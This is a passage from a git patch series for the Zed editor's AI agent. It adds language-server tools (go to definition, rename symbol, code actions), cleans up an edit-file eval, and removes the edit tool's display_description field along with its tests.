input.symbol.symbol_name + )); + } + + let mut output = format!("Found {} code action(s):\n", actions.len()); + for (i, action) in actions.iter().enumerate() { + writeln!(output, "{}. {}", i + 1, action.lsp_action.title()).ok(); + } + write!( + output, + "\nUse apply_code_action with the number of the action you want to apply." 
+ ) + .ok(); + + store.update(cx, |store, _cx| { + *store = Some(PendingCodeActions { + actions, + buffer: resolved.buffer, + }); + }); + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/go_to_definition_tool.rs b/crates/agent/src/tools/go_to_definition_tool.rs new file mode 100644 index 00000000000000..2061da124b0725 --- /dev/null +++ b/crates/agent/src/tools/go_to_definition_tool.rs @@ -0,0 +1,113 @@ +use std::fmt::Write; +use std::sync::Arc; + +use super::symbol_locator::{LocationDisplay, SymbolLocator}; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +/// Jumps to the definition of a symbol using the language server. +/// +/// Returns the file path and line number of the symbol's definition, +/// along with a snippet of the source code at that location. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number of a usage you want to navigate from. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct GoToDefinitionToolInput { + /// The symbol to find the definition of. 
+ pub symbol: SymbolLocator, +} + +pub struct GoToDefinitionTool { + project: Entity, +} + +impl GoToDefinitionTool { + pub fn new(project: Entity) -> Self { + Self { project } + } +} + +impl AgentTool for GoToDefinitionTool { + type Input = GoToDefinitionToolInput; + type Output = String; + + const NAME: &'static str = "go_to_definition"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Search + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!("Go to definition of `{}`", input.symbol.symbol_name).into() + } else { + "Go to definition".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let definitions_task = project.update(cx, |project, cx| { + project.definitions(&resolved.buffer, resolved.position, cx) + }); + + let definitions = definitions_task + .await + .map_err(|e| format!("Go to definition failed: {e}"))? 
+ .unwrap_or_default(); + + if definitions.is_empty() { + return Ok(format!( + "No definition found for '{}'.", + input.symbol.symbol_name + )); + } + + let mut output = String::new(); + + if definitions.len() == 1 { + write!(output, "Definition of `{}`:\n", input.symbol.symbol_name).ok(); + } else { + write!( + output, + "Found {} definitions of `{}`:\n", + definitions.len(), + input.symbol.symbol_name + ) + .ok(); + } + + for link in &definitions { + let display = link + .target + .buffer + .read_with(cx, |_, cx| LocationDisplay::from_location(&link.target, cx)); + write!(output, "\n## {display}\n").ok(); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/rename_tool.rs b/crates/agent/src/tools/rename_tool.rs new file mode 100644 index 00000000000000..7abc45d6956874 --- /dev/null +++ b/crates/agent/src/tools/rename_tool.rs @@ -0,0 +1,121 @@ +use std::fmt::Write; +use std::sync::Arc; + +use agent_client_protocol::schema as acp; +use gpui::{App, Entity, SharedString, Task}; +use project::Project; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; + +use super::symbol_locator::SymbolLocator; +use crate::{AgentTool, ToolCallEventStream, ToolInput}; + +/// Renames a symbol across the project using the language server. +/// +/// This performs a semantic rename, updating all references to the symbol +/// across all files in the project. The language server determines which +/// occurrences to rename based on the symbol's type and scope. +/// +/// Before using this tool, use read_file or grep to find the exact symbol +/// name and line number. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct RenameToolInput { + /// The symbol to rename. + pub symbol: SymbolLocator, + + /// The new name for the symbol. 
+ pub new_name: String, +} + +pub struct RenameTool { + project: Entity, +} + +impl RenameTool { + pub fn new(project: Entity) -> Self { + Self { project } + } +} + +impl AgentTool for RenameTool { + type Input = RenameToolInput; + type Output = String; + + const NAME: &'static str = "rename_symbol"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + input: Result, + _cx: &mut App, + ) -> SharedString { + if let Ok(input) = input { + format!( + "Rename `{}` to `{}`", + input.symbol.symbol_name, input.new_name + ) + .into() + } else { + "Rename symbol".into() + } + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let project = self.project.clone(); + cx.spawn(async move |cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + + let resolved = input.symbol.resolve(&project, cx).await?; + + let rename_task = project.update(cx, |project, cx| { + project.perform_rename( + resolved.buffer.clone(), + resolved.position, + input.new_name.clone(), + cx, + ) + }); + + let transaction = rename_task + .await + .map_err(|e| format!("Rename failed: {e}"))?; + + if transaction.0.is_empty() { + return Ok(format!( + "No changes were made. 
The language server could not rename '{}'.", + input.symbol.symbol_name + )); + } + + let mut output = format!( + "Renamed `{}` to `{}` in {} file(s):\n", + input.symbol.symbol_name, + input.new_name, + transaction.0.len() + ); + + for (buffer, _) in &transaction.0 { + buffer.read_with(cx, |buffer, cx| { + let path = buffer + .file() + .map(|f| f.full_path(cx).display().to_string()) + .unwrap_or_else(|| "".to_string()); + writeln!(output, "- {path}").ok(); + }); + } + + Ok(output) + }) + } +} diff --git a/crates/agent/src/tools/symbol_locator.rs b/crates/agent/src/tools/symbol_locator.rs new file mode 100644 index 00000000000000..cb38101877ea2a --- /dev/null +++ b/crates/agent/src/tools/symbol_locator.rs @@ -0,0 +1,239 @@ +use std::collections::VecDeque; +use std::fmt; + +use gpui::{App, AsyncApp, Entity}; +use language::{Buffer, Location}; +use project::{CodeAction, Project}; +use schemars::JsonSchema; +use serde::{Deserialize, Serialize}; +use text::ToPoint as _; +use text::{Anchor, Point}; + +/// Identifies a specific symbol (declaration or usage) in the source code. +/// +/// Use the file path, line number, and symbol name from file outlines, grep results, +/// or other tool outputs to populate these fields. +#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] +pub struct SymbolLocator { + /// The relative path of the file containing the symbol + /// (e.g. "crates/editor/src/editor.rs"). + pub file_path: String, + + /// The 1-based line number where the symbol appears. + /// Use the line numbers from file outlines or grep results. + pub line: u32, + + /// The name of the symbol (function name, type name, variable name, etc.) 
+ pub symbol_name: String, +} + +pub struct PendingCodeActions { + pub actions: Vec, + pub buffer: Entity, +} + +pub type CodeActionStore = Entity>; + +pub struct ResolvedSymbol { + pub buffer: Entity, + pub position: Anchor, + pub line_text: String, + pub truncated: bool, +} + +pub const MAX_LINE_DISPLAY_LEN: usize = 200; + +pub struct LocationDisplay { + pub path: String, + pub start_line: u32, + pub end_line: u32, + pub snippet: String, + pub truncated: bool, +} + +impl LocationDisplay { + pub fn from_location(location: &Location, cx: &App) -> Self { + let snapshot = location.buffer.read(cx).snapshot(); + let range = + location.range.start.to_point(&snapshot)..location.range.end.to_point(&snapshot); + let path = location + .buffer + .read(cx) + .file() + .map(|f| f.full_path(cx).display().to_string()) + .unwrap_or_else(|| "".to_string()); + + let start_line = range.start.row + 1; + let end_line = range.end.row + 1; + + let line_len = snapshot.line_len(range.start.row); + let truncated = line_len as usize > MAX_LINE_DISPLAY_LEN; + let snippet: String = snapshot + .text_for_range(Point::new(range.start.row, 0)..Point::new(range.start.row, line_len)) + .flat_map(|chunk| chunk.chars()) + .skip_while(|c| c.is_whitespace()) + .take(MAX_LINE_DISPLAY_LEN) + .collect::(); + let snippet = snippet.trim_end().to_string(); + + Self { + path, + start_line, + end_line, + snippet, + truncated, + } + } +} + +impl fmt::Display for LocationDisplay { + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + let truncated_label = if self.truncated { " (truncated)" } else { "" }; + if self.start_line == self.end_line { + writeln!(f, "{}#L{}{truncated_label}", self.path, self.start_line)?; + } else { + writeln!( + f, + "{}#L{}-{}{truncated_label}", + self.path, self.start_line, self.end_line + )?; + } + writeln!(f, "```")?; + writeln!(f, "{}", self.snippet)?; + write!(f, "```") + } +} + +/// Searches for `needle` in a char iterator, returning the byte offset of the +/// first 
occurrence without collecting the full iterator into a string. +/// +/// Equivalent to [`str::find`] +fn find_in_char_iter(chars: impl Iterator, needle: &str) -> Option { + let needle_chars: Vec = needle.chars().collect(); + if needle_chars.is_empty() { + return Some(0); + } + + let mut window: VecDeque = VecDeque::with_capacity(needle_chars.len()); + let mut byte_offsets: VecDeque = VecDeque::with_capacity(needle_chars.len()); + let mut byte_offset = 0usize; + + for ch in chars { + window.push_back(ch); + byte_offsets.push_back(byte_offset); + byte_offset += ch.len_utf8(); + + if window.len() > needle_chars.len() { + window.pop_front(); + byte_offsets.pop_front(); + } + + if window.len() == needle_chars.len() + && window.iter().zip(needle_chars.iter()).all(|(a, b)| a == b) + { + return byte_offsets.front().copied(); + } + } + + None +} + +impl SymbolLocator { + /// Resolves this locator into a concrete buffer and position. + /// + /// Opens the file at `file_path`, then searches for `symbol_name` on the + /// specified `line`. Returns an error if the file can't be found, the line + /// is out of range, or the symbol name doesn't appear on that line. + /// If the symbol name appears multiple times on the line, uses the first + /// occurrence. 
+ pub async fn resolve( + &self, + project: &Entity, + cx: &mut AsyncApp, + ) -> Result { + let Self { + file_path, + line, + symbol_name, + } = self; + + let open_buffer_task = project.update(cx, |project, cx| { + let Some(project_path) = project.find_project_path(file_path, cx) else { + return Err(format!("Could not find path '{file_path}' in project",)); + }; + Ok(project.open_buffer(project_path, cx)) + })?; + + let buffer = open_buffer_task + .await + .map_err(|e| format!("Failed to open '{}': {e}", self.file_path))?; + + let (position, line_text, truncated) = buffer.read_with(cx, |buffer, _cx| { + let snapshot = buffer.snapshot(); + let row = line.saturating_sub(1); + + if row > snapshot.max_point().row { + let line_count = snapshot.max_point().row + 1; + return Err(format!( + "Line {line} is beyond the end of '{file_path}' (file has {line_count} lines)", + )); + } + + let line_len = snapshot.line_len(row); + let truncated = line_len as usize > MAX_LINE_DISPLAY_LEN; + let line_start = Point::new(row, 0); + let line_end = Point::new(row, line_len); + let line_chars = || { + snapshot + .text_for_range(line_start..line_end) + .flat_map(|chunk| chunk.chars()) + }; + + let byte_offset = find_in_char_iter(line_chars(), symbol_name).ok_or_else(|| { + let preview: String = line_chars() + .skip_while(|c| c.is_whitespace()) + .take(MAX_LINE_DISPLAY_LEN) + .collect(); + format!( + "Symbol '{symbol_name}' not found on line {line} of '{file_path}'. 
\ + Line content: '{}'", + preview.trim_end() + ) + })?; + + let position = snapshot.anchor_before(Point::new(row, byte_offset as u32)); + let display_text: String = line_chars() + .skip_while(|c| c.is_whitespace()) + .take(MAX_LINE_DISPLAY_LEN) + .collect::(); + let display_text = display_text.trim_end().to_string(); + + Ok((position, display_text, truncated)) + })?; + + Ok(ResolvedSymbol { + buffer, + position, + line_text, + truncated, + }) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use gpui::proptest::prelude::*; + + #[gpui::property_test] + fn find_in_char_iter_test( + // limited character sets to increase odds of finding matches + #[strategy = "[abcd]{100,1000}"] haystack: String, + #[strategy = "[abcd]{1,5}"] needle: String, + ) -> Result<(), TestCaseError> { + let expected = haystack.find(&needle); + let actual = find_in_char_iter(haystack.chars(), &needle); + prop_assert_eq!(actual, expected); + Ok::<_, TestCaseError>(()) + } +} diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index 56e3d135d9ee75..d9af542efeabec 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -59,6 +59,18 @@ impl FeatureFlag for UpdatePlanToolFeatureFlag { } register_feature_flag!(UpdatePlanToolFeatureFlag); +pub struct LspToolFeatureFlag; + +impl FeatureFlag for LspToolFeatureFlag { + const NAME: &'static str = "lsp-tool"; + type Value = PresenceFlag; + + fn enabled_for_staff() -> bool { + false + } +} +register_feature_flag!(LspToolFeatureFlag); + pub struct ProjectPanelUndoRedoFeatureFlag; impl FeatureFlag for ProjectPanelUndoRedoFeatureFlag { diff --git a/crates/gpui/src/test.rs b/crates/gpui/src/test.rs index 9f224871330d90..a93424edeab601 100644 --- a/crates/gpui/src/test.rs +++ b/crates/gpui/src/test.rs @@ -71,16 +71,20 @@ pub fn apply_seed_to_proptest_config( /// /// Doesn't support many features of [`run_test`], since these are provided by /// proptest. 
-pub fn run_test_once(seed: u64, test_fn: Box) { +pub fn run_test_once( + seed: u64, + test_fn: Box R>, +) -> R { let result = panic::catch_unwind(|| { let dispatcher = TestDispatcher::new(seed); let scheduler = dispatcher.scheduler().clone(); - test_fn(dispatcher); + let res = test_fn(dispatcher); scheduler.end_test(); + res }); match result { - Ok(()) => {} + Ok(r) => r, Err(e) => panic::resume_unwind(e), } } diff --git a/crates/settings_ui/src/pages/tool_permissions_setup.rs b/crates/settings_ui/src/pages/tool_permissions_setup.rs index e6b49dd6c8ab27..12693cb99d98fc 100644 --- a/crates/settings_ui/src/pages/tool_permissions_setup.rs +++ b/crates/settings_ui/src/pages/tool_permissions_setup.rs @@ -1407,13 +1407,18 @@ mod tests { // 2. Add it to this list with a comment explaining why it's excluded. const EXCLUDED_TOOLS: &[&str] = &[ // Read-only / low-risk tools that don't call decide_permission_from_settings + "apply_code_action", "diagnostics", "find_path", + "find_references", + "get_code_actions", + "go_to_definition", "grep", "list_directory", "now", "open", "read_file", + "rename_symbol", "thinking", // streaming_edit_file uses "edit_file" for permission lookups, // so its rules are configured under the edit_file entry. 
From b3af1dc4df879f80b023efb5c08830755e744f81 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 11:58:05 +0200 Subject: [PATCH 187/231] agent: Cleanup edit_file evals (#55750) - Rename `streaming_edit_file` to `edit_file` - Remove workaround for replacing old edit tool with streaming edit file tool Release Notes: - N/A --- crates/agent/src/tools/evals.rs | 2 +- .../{streaming_edit_file.rs => edit_file.rs} | 50 +++++-------------- 2 files changed, 14 insertions(+), 38 deletions(-) rename crates/agent/src/tools/evals/{streaming_edit_file.rs => edit_file.rs} (96%) diff --git a/crates/agent/src/tools/evals.rs b/crates/agent/src/tools/evals.rs index 13b8413de6455c..b5d9f47ea5def0 100644 --- a/crates/agent/src/tools/evals.rs +++ b/crates/agent/src/tools/evals.rs @@ -1,2 +1,2 @@ #[cfg(all(test, feature = "unit-eval"))] -mod streaming_edit_file; +mod edit_file; diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/edit_file.rs similarity index 96% rename from crates/agent/src/tools/evals/streaming_edit_file.rs rename to crates/agent/src/tools/evals/edit_file.rs index 770e1f0effc2ab..cce9f41c6efd8d 100644 --- a/crates/agent/src/tools/evals/streaming_edit_file.rs +++ b/crates/agent/src/tools/evals/edit_file.rs @@ -15,9 +15,8 @@ use language::language_settings::FormatOnSave; use language_model::{ LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, - LanguageModelRequestTool, LanguageModelToolResult, LanguageModelToolResultContent, - LanguageModelToolSchemaFormat, LanguageModelToolUse, LanguageModelToolUseId, MessageContent, - Role, SelectedModel, + LanguageModelToolResult, LanguageModelToolResultContent, LanguageModelToolUse, + LanguageModelToolUseId, MessageContent, Role, SelectedModel, }; use project::Project; use prompt_store::{ProjectContext, WorktreeContext}; @@ -218,12 +217,12 @@ impl EvalAssertion { } 
#[derive(Clone)] -struct StreamingEditEvalOutput { +struct EditEvalOutput { sample: EvalSample, assertion: EvalAssertionOutcome, } -impl Display for StreamingEditEvalOutput { +impl Display for EditEvalOutput { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { writeln!(f, "Score: {:?}", self.assertion.score)?; if let Some(message) = self.assertion.message.as_ref() { @@ -241,7 +240,7 @@ struct EvalAssertionOutcome { message: Option, } -struct StreamingEditToolTest { +struct EditToolTest { fs: Arc, project: Entity, model: Arc, @@ -249,7 +248,7 @@ struct StreamingEditToolTest { model_thinking_effort: Option, } -impl StreamingEditToolTest { +impl EditToolTest { async fn new(cx: &mut TestAppContext) -> Self { cx.executor().allow_parking(); @@ -349,29 +348,7 @@ impl StreamingEditToolTest { })) } - /// Build the tool definitions for the model, replacing `edit_file` with the - /// streaming edit file tool schema. In production the streaming tool is - /// exposed under the name `"edit_file"` (see `Thread::enabled_tools`), so - /// the model has never seen the name `"streaming_edit_file"`. - fn build_tools() -> Vec { - let mut tools: Vec = crate::built_in_tools() - .filter(|tool| tool.name != EditFileTool::NAME) - .collect(); - tools.push(LanguageModelRequestTool { - name: EditFileTool::NAME.to_string(), - description: EditFileTool::description().to_string(), - input_schema: EditFileTool::input_schema(LanguageModelToolSchemaFormat::JsonSchema) - .to_value(), - use_input_streaming: EditFileTool::supports_input_streaming(), - }); - tools - } - - async fn eval( - &self, - mut eval: EvalInput, - cx: &mut TestAppContext, - ) -> Result { + async fn eval(&self, mut eval: EvalInput, cx: &mut TestAppContext) -> Result { eval.conversation .last_mut() .context("Conversation must not be empty")? 
@@ -391,7 +368,7 @@ impl StreamingEditToolTest { cx.run_until_parked(); } - let tools = Self::build_tools(); + let tools = crate::built_in_tools().collect::>(); let system_prompt = { let worktrees = vec![WorktreeContext { @@ -440,7 +417,7 @@ impl StreamingEditToolTest { }; // The model will call the tool as "edit_file" (the production-visible - // name), but the schema is from StreamingEditFileTool. + // name), but the schema is from EditFileTool. let tool_input = retry_on_rate_limit(async || self.extract_tool_use(request.clone(), cx).await).await?; @@ -505,12 +482,11 @@ impl StreamingEditToolTest { .run(&sample, self.judge_model.clone(), cx) .await?; - Ok(StreamingEditEvalOutput { assertion, sample }) + Ok(EditEvalOutput { assertion, sample }) } /// Stream the model completion and extract the first complete tool use - /// whose name matches `EditFileTool::NAME` (the production-visible name - /// for the streaming edit tool), parsed as `StreamingEditFileToolInput`. + /// whose name matches `EditFileTool::NAME`, parsed as `EditFileToolInput`. 
async fn extract_tool_use( &self, request: LanguageModelRequest, @@ -538,7 +514,7 @@ impl StreamingEditToolTest { && tool_use.name.as_ref() == EditFileTool::NAME => { let input: EditFileToolInput = serde_json::from_value(tool_use.input) - .context("Failed to parse tool input as StreamingEditFileToolInput")?; + .context("Failed to parse tool input as EditFileToolInput")?; return Ok(input); } Ok(LanguageModelCompletionEvent::Text(text)) => { @@ -590,7 +566,7 @@ fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput<()> { let mut cx = TestAppContext::build(dispatcher, None); let foreground_executor = cx.foreground_executor().clone(); let result = foreground_executor.block_test(async { - let test = StreamingEditToolTest::new(&mut cx).await; + let test = EditToolTest::new(&mut cx).await; let result = test.eval(eval, &mut cx).await; drop(test); cx.run_until_parked(); From a191e995e1f4960d9170d26ebb769a7ab566f3c2 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Tue, 5 May 2026 14:11:24 +0200 Subject: [PATCH 188/231] agent: Remove `display_description` from edit tool (#55752) We did not really use it in practice (we would only display it in the tool card header until we received a path), so as is it just wastes tokens. Therefore removing it. 
Release Notes: - agent: Reduce token usage when LLM edits file --- crates/agent/src/tests/mod.rs | 3 - crates/agent/src/tools/edit_file_tool.rs | 298 ++++----------------- crates/agent/src/tools/tool_permissions.rs | 13 +- 3 files changed, 51 insertions(+), 263 deletions(-) diff --git a/crates/agent/src/tests/mod.rs b/crates/agent/src/tests/mod.rs index c2efda7673d6aa..2a4e9c255fb3ce 100644 --- a/crates/agent/src/tests/mod.rs +++ b/crates/agent/src/tests/mod.rs @@ -6061,7 +6061,6 @@ async fn test_edit_file_tool_deny_rule_blocks_edit(cx: &mut TestAppContext) { let task = cx.update(|cx| { tool.run( ToolInput::resolved(crate::EditFileToolInput { - display_description: "Edit sensitive file".to_string(), path: "root/sensitive_config.txt".into(), mode: crate::EditFileMode::Edit, content: None, @@ -6496,7 +6495,6 @@ async fn test_edit_file_tool_allow_rule_skips_confirmation(cx: &mut TestAppConte let _task = cx.update(|cx| { tool.run( ToolInput::resolved(crate::EditFileToolInput { - display_description: "Edit README".to_string(), path: "root/README.md".into(), mode: crate::EditFileMode::Edit, content: None, @@ -6569,7 +6567,6 @@ async fn test_edit_file_tool_allow_still_prompts_for_local_settings(cx: &mut Tes let _task = cx.update(|cx| { tool.run( ToolInput::resolved(crate::EditFileToolInput { - display_description: "Edit local settings".to_string(), path: "root/.zed/settings.json".into(), mode: crate::EditFileMode::Edit, content: None, diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index a51e9883224a69..0e6493953c95ce 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -49,18 +49,6 @@ const DEFAULT_UI_TEXT: &str = "Editing file"; /// - Use the `list_directory` tool to verify the parent directory exists and is the correct location #[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] pub struct EditFileToolInput { - /// A one-line, user-friendly markdown description 
of the edit. This will be shown in the UI. - /// - /// Be terse, but also descriptive in what you want to achieve with this edit. Avoid generic instructions. - /// - /// NEVER mention the file path in this description. - /// - /// Fix API endpoint URLs - /// Update copyright year in `page_footer` - /// - /// Make sure to include this field before all the others in the input object so that we can display it immediately. - pub display_description: String, - /// The full path of the file to create or modify in the project. /// /// WARNING: When specifying which file path need changing, you MUST start each path with one of the project's root directories. @@ -131,8 +119,6 @@ pub struct Edit { #[derive(Clone, Default, Debug, Deserialize)] struct EditFileToolPartialInput { - #[serde(default)] - display_description: Option, #[serde(default)] path: Option, #[serde(default, deserialize_with = "deserialize_maybe_stringified")] @@ -278,14 +264,12 @@ impl EditFileTool { fn authorize( &self, path: &PathBuf, - description: &str, event_stream: &ToolCallEventStream, cx: &mut App, ) -> Task> { super::tool_permissions::authorize_file_edit( EditFileTool::NAME, path, - description, &self.thread, event_stream, cx, @@ -360,14 +344,12 @@ impl EditFileTool { && path_complete && let EditFileToolPartialInput { path: Some(path), - display_description: Some(display_description), mode: Some(mode), .. 
} = &parsed { match EditSession::new( PathBuf::from(path), - display_description, *mode, self, event_stream, @@ -400,7 +382,6 @@ impl EditFileTool { } else { match EditSession::new( full_input.path.clone(), - &full_input.display_description, full_input.mode, self, event_stream, @@ -505,12 +486,6 @@ impl AgentTool for EditFileTool { .unwrap_or_else(|| path.to_string()) .into(); } - - let description = input.display_description.unwrap_or_default(); - let description = description.trim(); - if !description.is_empty() { - return description.to_string().into(); - } } DEFAULT_UI_TEXT.into() @@ -881,7 +856,6 @@ impl EditPipeline { impl EditSession { async fn new( path: PathBuf, - display_description: &str, mode: EditFileMode, tool: &EditFileTool, event_stream: &ToolCallEventStream, @@ -901,7 +875,7 @@ impl EditSession { ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), ); - cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) + cx.update(|cx| tool.authorize(&path, event_stream, cx)) .await .map_err(|e| e.to_string())?; @@ -1296,7 +1270,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Create new file".into(), path: "root/dir/new_file.txt".into(), mode: EditFileMode::Write, content: Some("Hello, World!".into()), @@ -1323,7 +1296,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Overwrite file".into(), path: "root/file.txt".into(), mode: EditFileMode::Write, content: Some("new content".into()), @@ -1353,7 +1325,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit lines".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1385,7 +1356,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit multiple lines".into(), path: 
"root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1426,7 +1396,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit adjacent lines".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1467,7 +1436,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit multiple lines in ascending order".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1504,7 +1472,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Some edit".into(), path: "root/nonexistent_file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1540,7 +1507,6 @@ mod tests { .update(|cx| { tool.clone().run( ToolInput::resolved(EditFileToolInput { - display_description: "Edit file".into(), path: "root/file.txt".into(), mode: EditFileMode::Edit, content: None, @@ -1573,18 +1539,16 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send partials simulating LLM streaming: description first, then path, then mode - sender.send_partial(json!({"display_description": "Edit lines"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt" })); cx.run_until_parked(); // Path is NOT yet complete because mode hasn't appeared — no buffer open yet sender.send_partial(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit" })); @@ -1592,7 +1556,6 @@ mod tests { // Now send the final complete input sender.send_full(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -1615,14 +1578,12 @@ mod tests { // Send partial with path but NO mode — path should NOT be treated as complete 
sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file" })); cx.run_until_parked(); // Now the path grows and mode appears sender.send_partial(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write" })); @@ -1630,7 +1591,6 @@ mod tests { // Send final sender.send_full(json!({ - "display_description": "Overwrite file", "path": "root/file.txt", "mode": "write", "content": "new content" @@ -1653,7 +1613,7 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial - sender.send_partial(json!({"display_description": "Edit"})); + sender.send_partial(json!({})); cx.run_until_parked(); // Cancel during streaming @@ -1686,24 +1646,21 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Simulate fine-grained streaming of the JSON - sender.send_partial(json!({"display_description": "Edit multiple"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 1"}] @@ -1711,7 +1668,6 @@ mod tests { cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1723,7 +1679,6 @@ mod tests { // Send final complete input sender.send_full(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1750,18 +1705,16 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream partials for create mode - sender.send_partial(json!({"display_description": 
"Create new file"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write" })); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "Hello, " @@ -1770,7 +1723,6 @@ mod tests { // Final with full content sender.send_full(json!({ - "display_description": "Create new file", "path": "root/dir/new_file.txt", "mode": "write", "content": "Hello, World!" @@ -1793,7 +1745,6 @@ mod tests { // Send final immediately with no partials (simulates non-streaming path) sender.send_full(json!({ - "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] @@ -1818,11 +1769,10 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream description, path, mode - sender.send_partial(json!({"display_description": "Edit multiple lines"})); + sender.send_partial(json!({})); cx.run_until_parked(); sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit" })); @@ -1830,7 +1780,6 @@ mod tests { // First edit starts streaming (old_text only, still in progress) sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [{"old_text": "line 1"}] @@ -1857,7 +1806,6 @@ mod tests { // Second edit appears — this proves the first edit is complete, so it // should be applied immediately during streaming sender.send_partial(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1884,7 +1832,6 @@ mod tests { // Send final complete input sender.send_full(json!({ - "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", "edits": [ @@ -1917,7 +1864,6 @@ mod 
